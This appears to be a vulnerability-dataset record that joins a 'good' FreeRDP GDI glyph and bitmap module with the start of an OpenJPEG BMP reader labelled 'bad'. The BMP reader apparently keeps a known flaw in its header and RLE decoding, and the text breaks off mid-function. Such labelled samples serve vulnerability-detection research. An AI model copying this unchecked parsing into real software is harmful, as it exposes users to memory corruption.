const size_t dbpp = GetBytesPerPixel(bitmap->format);
if ((sbpp == 0) || (dbpp == 0))
return FALSE;
else
{
const size_t dstSize = SrcSize * dbpp / sbpp;
if (dstSize < bitmap->length)
return FALSE;
}
if (!freerdp_image_copy(bitmap->data, bitmap->format, 0, 0, 0,
DstWidth, DstHeight, pSrcData, SrcFormat,
0, 0, 0, &gdi->palette, FREERDP_FLIP_VERTICAL))
return FALSE;
}
return TRUE;
}
static BOOL gdi_Bitmap_SetSurface(rdpContext* context, rdpBitmap* bitmap,
BOOL primary)
{
rdpGdi* gdi;
if (!context)
return FALSE;
gdi = context->gdi;
if (!gdi)
return FALSE;
if (primary)
gdi->drawing = gdi->primary;
else
gdi->drawing = (gdiBitmap*) bitmap;
return TRUE;
}
/* Glyph Class */
static BOOL gdi_Glyph_New(rdpContext* context, const rdpGlyph* glyph)
{
BYTE* data;
gdiGlyph* gdi_glyph;
if (!context || !glyph)
return FALSE;
gdi_glyph = (gdiGlyph*) glyph;
gdi_glyph->hdc = gdi_GetDC();
if (!gdi_glyph->hdc)
return FALSE;
gdi_glyph->hdc->format = PIXEL_FORMAT_MONO;
data = freerdp_glyph_convert(glyph->cx, glyph->cy, glyph->aj);
if (!data)
{
gdi_DeleteDC(gdi_glyph->hdc);
return FALSE;
}
gdi_glyph->bitmap = gdi_CreateBitmap(glyph->cx, glyph->cy, PIXEL_FORMAT_MONO,
data);
if (!gdi_glyph->bitmap)
{
gdi_DeleteDC(gdi_glyph->hdc);
_aligned_free(data);
return FALSE;
}
gdi_SelectObject(gdi_glyph->hdc, (HGDIOBJECT) gdi_glyph->bitmap);
gdi_glyph->org_bitmap = NULL;
return TRUE;
}
static void gdi_Glyph_Free(rdpContext* context, rdpGlyph* glyph)
{
gdiGlyph* gdi_glyph;
gdi_glyph = (gdiGlyph*) glyph;
if (gdi_glyph)
{
gdi_SelectObject(gdi_glyph->hdc, (HGDIOBJECT) gdi_glyph->org_bitmap);
gdi_DeleteObject((HGDIOBJECT) gdi_glyph->bitmap);
gdi_DeleteDC(gdi_glyph->hdc);
free(glyph->aj);
free(glyph);
}
}
static BOOL gdi_Glyph_Draw(rdpContext* context, const rdpGlyph* glyph, INT32 x,
INT32 y, INT32 w, INT32 h, INT32 sx, INT32 sy, BOOL fOpRedundant)
{
gdiGlyph* gdi_glyph;
rdpGdi* gdi;
HGDI_BRUSH brush;
BOOL rc = FALSE;
if (!context || !glyph)
return FALSE;
gdi = context->gdi;
gdi_glyph = (gdiGlyph*) glyph;
if (!fOpRedundant && 0)
{
GDI_RECT rect = { 0 };
if (x > 0)
rect.left = x;
if (y > 0)
rect.top = y;
if (x + w > 0)
rect.right = x + w - 1;
if (y + h > 0)
rect.bottom = y + h - 1;
if ((rect.left < rect.right) && (rect.top < rect.bottom))
{
brush = gdi_CreateSolidBrush(gdi->drawing->hdc->bkColor);
if (!brush)
return FALSE;
gdi_FillRect(gdi->drawing->hdc, &rect, brush);
gdi_DeleteObject((HGDIOBJECT)brush);
}
}
brush = gdi_CreateSolidBrush(gdi->drawing->hdc->textColor);
if (!brush)
return FALSE;
gdi_SelectObject(gdi->drawing->hdc, (HGDIOBJECT)brush);
rc = gdi_BitBlt(gdi->drawing->hdc, x, y, w, h, gdi_glyph->hdc, sx, sy,
GDI_GLYPH_ORDER, &context->gdi->palette);
gdi_DeleteObject((HGDIOBJECT)brush);
return rc;
}
static BOOL gdi_Glyph_SetBounds(rdpContext* context, INT32 x, INT32 y, INT32 width, INT32 height)
{
rdpGdi* gdi;
if (!context || !context->gdi)
return FALSE;
gdi = context->gdi;
if (!gdi->drawing || !gdi->drawing->hdc)
return FALSE;
return gdi_SetClipRgn(gdi->drawing->hdc, x, y, width, height);
}
static BOOL gdi_Glyph_BeginDraw(rdpContext* context, INT32 x, INT32 y,
INT32 width, INT32 height, UINT32 bgcolor,
UINT32 fgcolor, BOOL fOpRedundant)
{
rdpGdi* gdi;
if (!context || !context->gdi)
return FALSE;
gdi = context->gdi;
if (!gdi->drawing || !gdi->drawing->hdc)
return FALSE;
if (!fOpRedundant)
{
if (!gdi_decode_color(gdi, bgcolor, &bgcolor, NULL))
return FALSE;
if (!gdi_decode_color(gdi, fgcolor, &fgcolor, NULL))
return FALSE;
gdi_SetClipRgn(gdi->drawing->hdc, x, y, width, height);
gdi_SetTextColor(gdi->drawing->hdc, bgcolor);
gdi_SetBkColor(gdi->drawing->hdc, fgcolor);
if (1)
{
GDI_RECT rect = { 0 };
HGDI_BRUSH brush = gdi_CreateSolidBrush(fgcolor);
if (!brush)
return FALSE;
if (x > 0)
rect.left = x;
if (y > 0)
rect.top = y;
rect.right = x + width - 1;
rect.bottom = y + height - 1;
if ((x + width > rect.left) && (y + height > rect.top))
gdi_FillRect(gdi->drawing->hdc, &rect, brush);
gdi_DeleteObject((HGDIOBJECT)brush);
}
return gdi_SetNullClipRgn(gdi->drawing->hdc);
}
return TRUE;
}
static BOOL gdi_Glyph_EndDraw(rdpContext* context, INT32 x, INT32 y,
INT32 width, INT32 height, UINT32 bgcolor, UINT32 fgcolor)
{
rdpGdi* gdi;
if (!context || !context->gdi)
return FALSE;
gdi = context->gdi;
if (!gdi->drawing || !gdi->drawing->hdc)
return FALSE;
gdi_SetNullClipRgn(gdi->drawing->hdc);
return TRUE;
}
/* Graphics Module */
BOOL gdi_register_graphics(rdpGraphics* graphics)
{
rdpBitmap bitmap;
rdpGlyph glyph;
bitmap.size = sizeof(gdiBitmap);
bitmap.New = gdi_Bitmap_New;
bitmap.Free = gdi_Bitmap_Free;
bitmap.Paint = gdi_Bitmap_Paint;
bitmap.Decompress = gdi_Bitmap_Decompress;
bitmap.SetSurface = gdi_Bitmap_SetSurface;
graphics_register_bitmap(graphics, &bitmap);
glyph.size = sizeof(gdiGlyph);
glyph.New = gdi_Glyph_New;
glyph.Free = gdi_Glyph_Free;
glyph.Draw = gdi_Glyph_Draw;
glyph.BeginDraw = gdi_Glyph_BeginDraw;
glyph.EndDraw = gdi_Glyph_EndDraw;
glyph.SetBounds = gdi_Glyph_SetBounds;
graphics_register_glyph(graphics, &glyph);
return TRUE;
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_673_0 |
crossvul-cpp_data_bad_4867_0 | /*
* The copyright in this software is being made available under the 2-clauses
* BSD License, included below. This software may be subject to other third
* party and contributor rights, including patent rights, and no such rights
* are granted under this license.
*
* Copyright (c) 2002-2014, Universite catholique de Louvain (UCL), Belgium
* Copyright (c) 2002-2014, Professor Benoit Macq
* Copyright (c) 2001-2003, David Janssens
* Copyright (c) 2002-2003, Yannick Verschueren
* Copyright (c) 2003-2007, Francois-Olivier Devaux
* Copyright (c) 2003-2014, Antonin Descampe
* Copyright (c) 2005, Herve Drolon, FreeImage Team
* Copyright (c) 2006-2007, Parvatha Elangovan
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS `AS IS'
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
#include "opj_apps_config.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include "openjpeg.h"
#include "convert.h"
typedef struct {
OPJ_UINT16 bfType; /* 'BM' for Bitmap (19776) */
OPJ_UINT32 bfSize; /* Size of the file */
OPJ_UINT16 bfReserved1; /* Reserved : 0 */
OPJ_UINT16 bfReserved2; /* Reserved : 0 */
OPJ_UINT32 bfOffBits; /* Offset */
} OPJ_BITMAPFILEHEADER;
typedef struct {
OPJ_UINT32 biSize; /* Size of the structure in bytes */
OPJ_UINT32 biWidth; /* Width of the image in pixels */
OPJ_UINT32 biHeight; /* Heigth of the image in pixels */
OPJ_UINT16 biPlanes; /* 1 */
OPJ_UINT16 biBitCount; /* Number of color bits by pixels */
OPJ_UINT32 biCompression; /* Type of encoding 0: none 1: RLE8 2: RLE4 */
OPJ_UINT32 biSizeImage; /* Size of the image in bytes */
OPJ_UINT32 biXpelsPerMeter; /* Horizontal (X) resolution in pixels/meter */
OPJ_UINT32 biYpelsPerMeter; /* Vertical (Y) resolution in pixels/meter */
OPJ_UINT32 biClrUsed; /* Number of color used in the image (0: ALL) */
OPJ_UINT32 biClrImportant; /* Number of important color (0: ALL) */
OPJ_UINT32 biRedMask; /* Red channel bit mask */
OPJ_UINT32 biGreenMask; /* Green channel bit mask */
OPJ_UINT32 biBlueMask; /* Blue channel bit mask */
OPJ_UINT32 biAlphaMask; /* Alpha channel bit mask */
OPJ_UINT32 biColorSpaceType; /* Color space type */
OPJ_UINT8 biColorSpaceEP[36]; /* Color space end points */
OPJ_UINT32 biRedGamma; /* Red channel gamma */
OPJ_UINT32 biGreenGamma; /* Green channel gamma */
OPJ_UINT32 biBlueGamma; /* Blue channel gamma */
OPJ_UINT32 biIntent; /* Intent */
OPJ_UINT32 biIccProfileData; /* ICC profile data */
OPJ_UINT32 biIccProfileSize; /* ICC profile size */
OPJ_UINT32 biReserved; /* Reserved */
} OPJ_BITMAPINFOHEADER;
static void opj_applyLUT8u_8u32s_C1R(
OPJ_UINT8 const* pSrc, OPJ_INT32 srcStride,
OPJ_INT32* pDst, OPJ_INT32 dstStride,
OPJ_UINT8 const* pLUT,
OPJ_UINT32 width, OPJ_UINT32 height)
{
OPJ_UINT32 y;
for (y = height; y != 0U; --y) {
OPJ_UINT32 x;
for(x = 0; x < width; x++)
{
pDst[x] = (OPJ_INT32)pLUT[pSrc[x]];
}
pSrc += srcStride;
pDst += dstStride;
}
}
static void opj_applyLUT8u_8u32s_C1P3R(
OPJ_UINT8 const* pSrc, OPJ_INT32 srcStride,
OPJ_INT32* const* pDst, OPJ_INT32 const* pDstStride,
OPJ_UINT8 const* const* pLUT,
OPJ_UINT32 width, OPJ_UINT32 height)
{
OPJ_UINT32 y;
OPJ_INT32* pR = pDst[0];
OPJ_INT32* pG = pDst[1];
OPJ_INT32* pB = pDst[2];
OPJ_UINT8 const* pLUT_R = pLUT[0];
OPJ_UINT8 const* pLUT_G = pLUT[1];
OPJ_UINT8 const* pLUT_B = pLUT[2];
for (y = height; y != 0U; --y) {
OPJ_UINT32 x;
for(x = 0; x < width; x++)
{
OPJ_UINT8 idx = pSrc[x];
pR[x] = (OPJ_INT32)pLUT_R[idx];
pG[x] = (OPJ_INT32)pLUT_G[idx];
pB[x] = (OPJ_INT32)pLUT_B[idx];
}
pSrc += srcStride;
pR += pDstStride[0];
pG += pDstStride[1];
pB += pDstStride[2];
}
}
static void bmp24toimage(const OPJ_UINT8* pData, OPJ_UINT32 stride, opj_image_t* image)
{
int index;
OPJ_UINT32 width, height;
OPJ_UINT32 x, y;
const OPJ_UINT8 *pSrc = NULL;
width = image->comps[0].w;
height = image->comps[0].h;
index = 0;
pSrc = pData + (height - 1U) * stride;
for(y = 0; y < height; y++)
{
for(x = 0; x < width; x++)
{
image->comps[0].data[index] = (OPJ_INT32)pSrc[3*x+2]; /* R */
image->comps[1].data[index] = (OPJ_INT32)pSrc[3*x+1]; /* G */
image->comps[2].data[index] = (OPJ_INT32)pSrc[3*x+0]; /* B */
index++;
}
pSrc -= stride;
}
}
static void bmp_mask_get_shift_and_prec(OPJ_UINT32 mask, OPJ_UINT32* shift, OPJ_UINT32* prec)
{
OPJ_UINT32 l_shift, l_prec;
l_shift = l_prec = 0U;
if (mask != 0U) {
while ((mask & 1U) == 0U) {
mask >>= 1;
l_shift++;
}
while (mask & 1U) {
mask >>= 1;
l_prec++;
}
}
*shift = l_shift; *prec = l_prec;
}
static void bmpmask32toimage(const OPJ_UINT8* pData, OPJ_UINT32 stride, opj_image_t* image, OPJ_UINT32 redMask, OPJ_UINT32 greenMask, OPJ_UINT32 blueMask, OPJ_UINT32 alphaMask)
{
int index;
OPJ_UINT32 width, height;
OPJ_UINT32 x, y;
const OPJ_UINT8 *pSrc = NULL;
OPJ_BOOL hasAlpha;
OPJ_UINT32 redShift, redPrec;
OPJ_UINT32 greenShift, greenPrec;
OPJ_UINT32 blueShift, bluePrec;
OPJ_UINT32 alphaShift, alphaPrec;
width = image->comps[0].w;
height = image->comps[0].h;
hasAlpha = image->numcomps > 3U;
bmp_mask_get_shift_and_prec(redMask, &redShift, &redPrec);
bmp_mask_get_shift_and_prec(greenMask, &greenShift, &greenPrec);
bmp_mask_get_shift_and_prec(blueMask, &blueShift, &bluePrec);
bmp_mask_get_shift_and_prec(alphaMask, &alphaShift, &alphaPrec);
image->comps[0].bpp = redPrec;
image->comps[0].prec = redPrec;
image->comps[1].bpp = greenPrec;
image->comps[1].prec = greenPrec;
image->comps[2].bpp = bluePrec;
image->comps[2].prec = bluePrec;
if (hasAlpha) {
image->comps[3].bpp = alphaPrec;
image->comps[3].prec = alphaPrec;
}
index = 0;
pSrc = pData + (height - 1U) * stride;
for(y = 0; y < height; y++)
{
for(x = 0; x < width; x++)
{
OPJ_UINT32 value = 0U;
value |= ((OPJ_UINT32)pSrc[4*x+0]) << 0;
value |= ((OPJ_UINT32)pSrc[4*x+1]) << 8;
value |= ((OPJ_UINT32)pSrc[4*x+2]) << 16;
value |= ((OPJ_UINT32)pSrc[4*x+3]) << 24;
image->comps[0].data[index] = (OPJ_INT32)((value & redMask) >> redShift); /* R */
image->comps[1].data[index] = (OPJ_INT32)((value & greenMask) >> greenShift); /* G */
image->comps[2].data[index] = (OPJ_INT32)((value & blueMask) >> blueShift); /* B */
if (hasAlpha) {
image->comps[3].data[index] = (OPJ_INT32)((value & alphaMask) >> alphaShift); /* A */
}
index++;
}
pSrc -= stride;
}
}
static void bmpmask16toimage(const OPJ_UINT8* pData, OPJ_UINT32 stride, opj_image_t* image, OPJ_UINT32 redMask, OPJ_UINT32 greenMask, OPJ_UINT32 blueMask, OPJ_UINT32 alphaMask)
{
int index;
OPJ_UINT32 width, height;
OPJ_UINT32 x, y;
const OPJ_UINT8 *pSrc = NULL;
OPJ_BOOL hasAlpha;
OPJ_UINT32 redShift, redPrec;
OPJ_UINT32 greenShift, greenPrec;
OPJ_UINT32 blueShift, bluePrec;
OPJ_UINT32 alphaShift, alphaPrec;
width = image->comps[0].w;
height = image->comps[0].h;
hasAlpha = image->numcomps > 3U;
bmp_mask_get_shift_and_prec(redMask, &redShift, &redPrec);
bmp_mask_get_shift_and_prec(greenMask, &greenShift, &greenPrec);
bmp_mask_get_shift_and_prec(blueMask, &blueShift, &bluePrec);
bmp_mask_get_shift_and_prec(alphaMask, &alphaShift, &alphaPrec);
image->comps[0].bpp = redPrec;
image->comps[0].prec = redPrec;
image->comps[1].bpp = greenPrec;
image->comps[1].prec = greenPrec;
image->comps[2].bpp = bluePrec;
image->comps[2].prec = bluePrec;
if (hasAlpha) {
image->comps[3].bpp = alphaPrec;
image->comps[3].prec = alphaPrec;
}
index = 0;
pSrc = pData + (height - 1U) * stride;
for(y = 0; y < height; y++)
{
for(x = 0; x < width; x++)
{
OPJ_UINT32 value = 0U;
value |= ((OPJ_UINT32)pSrc[2*x+0]) << 0;
value |= ((OPJ_UINT32)pSrc[2*x+1]) << 8;
image->comps[0].data[index] = (OPJ_INT32)((value & redMask) >> redShift); /* R */
image->comps[1].data[index] = (OPJ_INT32)((value & greenMask) >> greenShift); /* G */
image->comps[2].data[index] = (OPJ_INT32)((value & blueMask) >> blueShift); /* B */
if (hasAlpha) {
image->comps[3].data[index] = (OPJ_INT32)((value & alphaMask) >> alphaShift); /* A */
}
index++;
}
pSrc -= stride;
}
}
static opj_image_t* bmp8toimage(const OPJ_UINT8* pData, OPJ_UINT32 stride, opj_image_t* image, OPJ_UINT8 const* const* pLUT)
{
OPJ_UINT32 width, height;
const OPJ_UINT8 *pSrc = NULL;
width = image->comps[0].w;
height = image->comps[0].h;
pSrc = pData + (height - 1U) * stride;
if (image->numcomps == 1U) {
opj_applyLUT8u_8u32s_C1R(pSrc, -(OPJ_INT32)stride, image->comps[0].data, (OPJ_INT32)width, pLUT[0], width, height);
}
else {
OPJ_INT32* pDst[3];
OPJ_INT32 pDstStride[3];
pDst[0] = image->comps[0].data; pDst[1] = image->comps[1].data; pDst[2] = image->comps[2].data;
pDstStride[0] = (OPJ_INT32)width; pDstStride[1] = (OPJ_INT32)width; pDstStride[2] = (OPJ_INT32)width;
opj_applyLUT8u_8u32s_C1P3R(pSrc, -(OPJ_INT32)stride, pDst, pDstStride, pLUT, width, height);
}
return image;
}
static OPJ_BOOL bmp_read_file_header(FILE* IN, OPJ_BITMAPFILEHEADER* header)
{
header->bfType = (OPJ_UINT16)getc(IN);
header->bfType |= (OPJ_UINT16)((OPJ_UINT32)getc(IN) << 8);
if (header->bfType != 19778) {
fprintf(stderr,"Error, not a BMP file!\n");
return OPJ_FALSE;
}
/* FILE HEADER */
/* ------------- */
header->bfSize = (OPJ_UINT32)getc(IN);
header->bfSize |= (OPJ_UINT32)getc(IN) << 8;
header->bfSize |= (OPJ_UINT32)getc(IN) << 16;
header->bfSize |= (OPJ_UINT32)getc(IN) << 24;
header->bfReserved1 = (OPJ_UINT16)getc(IN);
header->bfReserved1 |= (OPJ_UINT16)((OPJ_UINT32)getc(IN) << 8);
header->bfReserved2 = (OPJ_UINT16)getc(IN);
header->bfReserved2 |= (OPJ_UINT16)((OPJ_UINT32)getc(IN) << 8);
header->bfOffBits = (OPJ_UINT32)getc(IN);
header->bfOffBits |= (OPJ_UINT32)getc(IN) << 8;
header->bfOffBits |= (OPJ_UINT32)getc(IN) << 16;
header->bfOffBits |= (OPJ_UINT32)getc(IN) << 24;
return OPJ_TRUE;
}
static OPJ_BOOL bmp_read_info_header(FILE* IN, OPJ_BITMAPINFOHEADER* header)
{
memset(header, 0, sizeof(*header));
/* INFO HEADER */
/* ------------- */
header->biSize = (OPJ_UINT32)getc(IN);
header->biSize |= (OPJ_UINT32)getc(IN) << 8;
header->biSize |= (OPJ_UINT32)getc(IN) << 16;
header->biSize |= (OPJ_UINT32)getc(IN) << 24;
switch (header->biSize) {
case 12U: /* BITMAPCOREHEADER */
case 40U: /* BITMAPINFOHEADER */
case 52U: /* BITMAPV2INFOHEADER */
case 56U: /* BITMAPV3INFOHEADER */
case 108U: /* BITMAPV4HEADER */
case 124U: /* BITMAPV5HEADER */
break;
default:
fprintf(stderr,"Error, unknown BMP header size %d\n", header->biSize);
return OPJ_FALSE;
}
header->biWidth = (OPJ_UINT32)getc(IN);
header->biWidth |= (OPJ_UINT32)getc(IN) << 8;
header->biWidth |= (OPJ_UINT32)getc(IN) << 16;
header->biWidth |= (OPJ_UINT32)getc(IN) << 24;
header->biHeight = (OPJ_UINT32)getc(IN);
header->biHeight |= (OPJ_UINT32)getc(IN) << 8;
header->biHeight |= (OPJ_UINT32)getc(IN) << 16;
header->biHeight |= (OPJ_UINT32)getc(IN) << 24;
header->biPlanes = (OPJ_UINT16)getc(IN);
header->biPlanes |= (OPJ_UINT16)((OPJ_UINT32)getc(IN) << 8);
header->biBitCount = (OPJ_UINT16)getc(IN);
header->biBitCount |= (OPJ_UINT16)((OPJ_UINT32)getc(IN) << 8);
if(header->biSize >= 40U) {
header->biCompression = (OPJ_UINT32)getc(IN);
header->biCompression |= (OPJ_UINT32)getc(IN) << 8;
header->biCompression |= (OPJ_UINT32)getc(IN) << 16;
header->biCompression |= (OPJ_UINT32)getc(IN) << 24;
header->biSizeImage = (OPJ_UINT32)getc(IN);
header->biSizeImage |= (OPJ_UINT32)getc(IN) << 8;
header->biSizeImage |= (OPJ_UINT32)getc(IN) << 16;
header->biSizeImage |= (OPJ_UINT32)getc(IN) << 24;
header->biXpelsPerMeter = (OPJ_UINT32)getc(IN);
header->biXpelsPerMeter |= (OPJ_UINT32)getc(IN) << 8;
header->biXpelsPerMeter |= (OPJ_UINT32)getc(IN) << 16;
header->biXpelsPerMeter |= (OPJ_UINT32)getc(IN) << 24;
header->biYpelsPerMeter = (OPJ_UINT32)getc(IN);
header->biYpelsPerMeter |= (OPJ_UINT32)getc(IN) << 8;
header->biYpelsPerMeter |= (OPJ_UINT32)getc(IN) << 16;
header->biYpelsPerMeter |= (OPJ_UINT32)getc(IN) << 24;
header->biClrUsed = (OPJ_UINT32)getc(IN);
header->biClrUsed |= (OPJ_UINT32)getc(IN) << 8;
header->biClrUsed |= (OPJ_UINT32)getc(IN) << 16;
header->biClrUsed |= (OPJ_UINT32)getc(IN) << 24;
header->biClrImportant = (OPJ_UINT32)getc(IN);
header->biClrImportant |= (OPJ_UINT32)getc(IN) << 8;
header->biClrImportant |= (OPJ_UINT32)getc(IN) << 16;
header->biClrImportant |= (OPJ_UINT32)getc(IN) << 24;
}
if(header->biSize >= 56U) {
header->biRedMask = (OPJ_UINT32)getc(IN);
header->biRedMask |= (OPJ_UINT32)getc(IN) << 8;
header->biRedMask |= (OPJ_UINT32)getc(IN) << 16;
header->biRedMask |= (OPJ_UINT32)getc(IN) << 24;
header->biGreenMask = (OPJ_UINT32)getc(IN);
header->biGreenMask |= (OPJ_UINT32)getc(IN) << 8;
header->biGreenMask |= (OPJ_UINT32)getc(IN) << 16;
header->biGreenMask |= (OPJ_UINT32)getc(IN) << 24;
header->biBlueMask = (OPJ_UINT32)getc(IN);
header->biBlueMask |= (OPJ_UINT32)getc(IN) << 8;
header->biBlueMask |= (OPJ_UINT32)getc(IN) << 16;
header->biBlueMask |= (OPJ_UINT32)getc(IN) << 24;
header->biAlphaMask = (OPJ_UINT32)getc(IN);
header->biAlphaMask |= (OPJ_UINT32)getc(IN) << 8;
header->biAlphaMask |= (OPJ_UINT32)getc(IN) << 16;
header->biAlphaMask |= (OPJ_UINT32)getc(IN) << 24;
}
if(header->biSize >= 108U) {
header->biColorSpaceType = (OPJ_UINT32)getc(IN);
header->biColorSpaceType |= (OPJ_UINT32)getc(IN) << 8;
header->biColorSpaceType |= (OPJ_UINT32)getc(IN) << 16;
header->biColorSpaceType |= (OPJ_UINT32)getc(IN) << 24;
if (fread(&(header->biColorSpaceEP), 1U, sizeof(header->biColorSpaceEP), IN) != sizeof(header->biColorSpaceEP)) {
fprintf(stderr,"Error, can't read BMP header\n");
return OPJ_FALSE;
}
header->biRedGamma = (OPJ_UINT32)getc(IN);
header->biRedGamma |= (OPJ_UINT32)getc(IN) << 8;
header->biRedGamma |= (OPJ_UINT32)getc(IN) << 16;
header->biRedGamma |= (OPJ_UINT32)getc(IN) << 24;
header->biGreenGamma = (OPJ_UINT32)getc(IN);
header->biGreenGamma |= (OPJ_UINT32)getc(IN) << 8;
header->biGreenGamma |= (OPJ_UINT32)getc(IN) << 16;
header->biGreenGamma |= (OPJ_UINT32)getc(IN) << 24;
header->biBlueGamma = (OPJ_UINT32)getc(IN);
header->biBlueGamma |= (OPJ_UINT32)getc(IN) << 8;
header->biBlueGamma |= (OPJ_UINT32)getc(IN) << 16;
header->biBlueGamma |= (OPJ_UINT32)getc(IN) << 24;
}
if(header->biSize >= 124U) {
header->biIntent = (OPJ_UINT32)getc(IN);
header->biIntent |= (OPJ_UINT32)getc(IN) << 8;
header->biIntent |= (OPJ_UINT32)getc(IN) << 16;
header->biIntent |= (OPJ_UINT32)getc(IN) << 24;
header->biIccProfileData = (OPJ_UINT32)getc(IN);
header->biIccProfileData |= (OPJ_UINT32)getc(IN) << 8;
header->biIccProfileData |= (OPJ_UINT32)getc(IN) << 16;
header->biIccProfileData |= (OPJ_UINT32)getc(IN) << 24;
header->biIccProfileSize = (OPJ_UINT32)getc(IN);
header->biIccProfileSize |= (OPJ_UINT32)getc(IN) << 8;
header->biIccProfileSize |= (OPJ_UINT32)getc(IN) << 16;
header->biIccProfileSize |= (OPJ_UINT32)getc(IN) << 24;
header->biReserved = (OPJ_UINT32)getc(IN);
header->biReserved |= (OPJ_UINT32)getc(IN) << 8;
header->biReserved |= (OPJ_UINT32)getc(IN) << 16;
header->biReserved |= (OPJ_UINT32)getc(IN) << 24;
}
return OPJ_TRUE;
}
static OPJ_BOOL bmp_read_raw_data(FILE* IN, OPJ_UINT8* pData, OPJ_UINT32 stride, OPJ_UINT32 width, OPJ_UINT32 height)
{
OPJ_ARG_NOT_USED(width);
if ( fread(pData, sizeof(OPJ_UINT8), stride * height, IN) != (stride * height) )
{
fprintf(stderr, "\nError: fread return a number of element different from the expected.\n");
return OPJ_FALSE;
}
return OPJ_TRUE;
}
static OPJ_BOOL bmp_read_rle8_data(FILE* IN, OPJ_UINT8* pData, OPJ_UINT32 stride, OPJ_UINT32 width, OPJ_UINT32 height)
{
OPJ_UINT32 x, y;
OPJ_UINT8 *pix;
const OPJ_UINT8 *beyond;
beyond = pData + stride * height;
pix = pData;
x = y = 0U;
while (y < height)
{
int c = getc(IN);
if (c) {
int j;
OPJ_UINT8 c1 = (OPJ_UINT8)getc(IN);
for (j = 0; (j < c) && (x < width) && ((OPJ_SIZE_T)pix < (OPJ_SIZE_T)beyond); j++, x++, pix++) {
*pix = c1;
}
}
else {
c = getc(IN);
if (c == 0x00) { /* EOL */
x = 0;
++y;
pix = pData + y * stride + x;
}
else if (c == 0x01) { /* EOP */
break;
}
else if (c == 0x02) { /* MOVE by dxdy */
c = getc(IN);
x += (OPJ_UINT32)c;
c = getc(IN);
y += (OPJ_UINT32)c;
pix = pData + y * stride + x;
}
else /* 03 .. 255 */
{
int j;
for (j = 0; (j < c) && (x < width) && ((OPJ_SIZE_T)pix < (OPJ_SIZE_T)beyond); j++, x++, pix++)
{
OPJ_UINT8 c1 = (OPJ_UINT8)getc(IN);
*pix = c1;
}
if ((OPJ_UINT32)c & 1U) { /* skip padding byte */
getc(IN);
}
}
}
}/* while() */
return OPJ_TRUE;
}
static OPJ_BOOL bmp_read_rle4_data(FILE* IN, OPJ_UINT8* pData, OPJ_UINT32 stride, OPJ_UINT32 width, OPJ_UINT32 height)
{
OPJ_UINT32 x, y;
OPJ_UINT8 *pix;
const OPJ_UINT8 *beyond;
beyond = pData + stride * height;
pix = pData;
x = y = 0U;
while(y < height)
{
int c = getc(IN);
if(c == EOF) break;
if(c) {/* encoded mode */
int j;
OPJ_UINT8 c1 = (OPJ_UINT8)getc(IN);
for (j = 0; (j < c) && (x < width) && ((OPJ_SIZE_T)pix < (OPJ_SIZE_T)beyond); j++, x++, pix++) {
*pix = (OPJ_UINT8)((j&1) ? (c1 & 0x0fU) : ((c1>>4)&0x0fU));
}
}
else { /* absolute mode */
c = getc(IN);
if(c == EOF) break;
if(c == 0x00) { /* EOL */
x = 0; y++; pix = pData + y * stride;
}
else if(c == 0x01) { /* EOP */
break;
}
else if(c == 0x02) { /* MOVE by dxdy */
c = getc(IN); x += (OPJ_UINT32)c;
c = getc(IN); y += (OPJ_UINT32)c;
pix = pData + y * stride + x;
}
else { /* 03 .. 255 : absolute mode */
int j;
OPJ_UINT8 c1 = 0U;
for (j = 0; (j < c) && (x < width) && ((OPJ_SIZE_T)pix < (OPJ_SIZE_T)beyond); j++, x++, pix++) {
if((j&1) == 0) {
c1 = (OPJ_UINT8)getc(IN);
}
*pix = (OPJ_UINT8)((j&1) ? (c1 & 0x0fU) : ((c1>>4)&0x0fU));
}
if(((c&3) == 1) || ((c&3) == 2)) { /* skip padding byte */
getc(IN);
}
}
}
} /* while(y < height) */
return OPJ_TRUE;
}
opj_image_t* bmptoimage(const char *filename, opj_cparameters_t *parameters)
{
opj_image_cmptparm_t cmptparm[4]; /* maximum of 4 components */
OPJ_UINT8 lut_R[256], lut_G[256], lut_B[256];
OPJ_UINT8 const* pLUT[3];
opj_image_t * image = NULL;
FILE *IN;
OPJ_BITMAPFILEHEADER File_h;
OPJ_BITMAPINFOHEADER Info_h;
OPJ_UINT32 i, palette_len, numcmpts = 1U;
OPJ_BOOL l_result = OPJ_FALSE;
OPJ_UINT8* pData = NULL;
OPJ_UINT32 stride;
pLUT[0] = lut_R; pLUT[1] = lut_G; pLUT[2] = lut_B;
IN = fopen(filename, "rb");
if (!IN)
{
fprintf(stderr, "Failed to open %s for reading !!\n", filename);
return NULL;
}
if (!bmp_read_file_header(IN, &File_h)) {
fclose(IN);
return NULL;
}
if (!bmp_read_info_header(IN, &Info_h)) {
fclose(IN);
return NULL;
}
/* Load palette */
if (Info_h.biBitCount <= 8U)
{
memset(&lut_R[0], 0, sizeof(lut_R));
memset(&lut_G[0], 0, sizeof(lut_G));
memset(&lut_B[0], 0, sizeof(lut_B));
palette_len = Info_h.biClrUsed;
if((palette_len == 0U) && (Info_h.biBitCount <= 8U)) {
palette_len = (1U << Info_h.biBitCount);
}
if (palette_len > 256U) {
palette_len = 256U;
}
if (palette_len > 0U) {
OPJ_UINT8 has_color = 0U;
for (i = 0U; i < palette_len; i++) {
